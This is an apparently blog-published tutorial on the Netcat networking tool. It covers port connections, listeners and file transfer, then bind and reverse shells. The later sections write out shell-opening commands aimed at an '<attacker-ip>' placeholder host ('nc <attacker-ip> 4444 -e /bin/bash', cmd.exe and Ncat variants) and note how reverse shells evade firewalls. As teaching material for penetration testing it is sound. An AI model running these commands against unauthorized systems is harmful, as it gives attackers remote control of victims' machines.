Netcat The Hacker's Swiss Army Knife
Netcat, often abbreviated as nc, is a versatile command-line networking tool that can be used for almost anything related to TCP, UDP, or UNIX-domain sockets. It's beloved by network engineers, sysadmins, and ethical hackers alike for its power and simplicity.
Connecting to a TCP/UDP Port
One of Netcatβs most basic functions is connecting to open TCP or UDP ports on remote systems. This is often used for testing services or debugging.
TCP Connection
nc <host> <port>nc example.com 80Once connected, you can type HTTP requests manually:
GET / HTTP/1.1Host: example.com Example session:
thilan@macbook:~$ nc hacksland.net 443
GET /HTTP/1.1
<html>
<head><title>400 The plain HTTP request was sent to HTTPS port</title></head>
<body>
<center><h1>400 Bad Request</h1></center>
<center>The plain HTTP request was sent to HTTPS port</center>
<hr><center>cloudflare</center>
</body>
</html>π‘ UDP Connection
nc -u <host> <port>nc -u 192.168.1.10 12345Useful for checking if a UDP service is responsive.
π‘ Listening on a TCP/UDP Port Netcat can also operate as a server, listening for incoming connections. This is especially useful for testing and scripting.
β TCP Listener
nc -l <port>π Example:
nc -l 4444Connecting from another machine:
thilan@ubuntu:~$ nc -lv 4444
Listening on 0.0.0.0 4444
Connection received on 111.223.183.3 5839
hiii
hello from ubuntuthilan@macbook:~$ nc 82.29.160.2 4444
hiii
hello from ubuntuπ‘ UDP Listener
nc -lu
nc -lu 12345Send data from another machine:
nc -u <host> 12345π Transferring Files with Netcat Netcat can easily transfer files over a network without needing FTP or SCP.
Send a file:
# Receiver
nc -l 4444 > received_file.txtReceive the file from another terminal:
Sender
nc
Transfer binary files:
Receiver
nc -l 4444 > file.bin
Sender
nc
πͺ Netcat Bind Shell A bind shell is when a target machine opens a port and spawns a shell waiting for a connection.
β οΈ Only use this on machines you have permission to test.
On the victim machine (listener):
nc -l -p 4444 -e /bin/bash # Linux
nc -l -p 4444 -e cmd.exe # WindowsOn the attacker's machine:
nc <target-ip> 4444π³οΈ Netcat Reverse Shell A reverse shell is where the victim connects back to the attacker and sends a shell session.
On the attacker's machine (listener):
nc -l -p 4444On the victim's machine:
nc <attacker-ip> 4444 -e /bin/bash # Linux
nc <attacker-ip> 4444 -e cmd.exe # Windowsπ Reverse shells are more firewall-evading because they originate from the inside out.
Netcat Variants & Security Notes
Modern systems may include restricted versions of Netcat, especially the OpenBSD variant, which disables the -e option for security reasons.
β Ncat (from Nmap) - safer & more powerful:
ncat --exec "/bin/bash" --allow <attacker-ip> -l 4444Or from the victim:
ncat <attacker-ip> 4444 -e /bin/bashπ§ Pro Tips for Using Netcat Use -v for verbose output.
Use -w
Pipe into nc for automation with scripts.
Combine with tar to send entire folders.
On Windows, consider using ncat.exe from Nmap for full functionality.
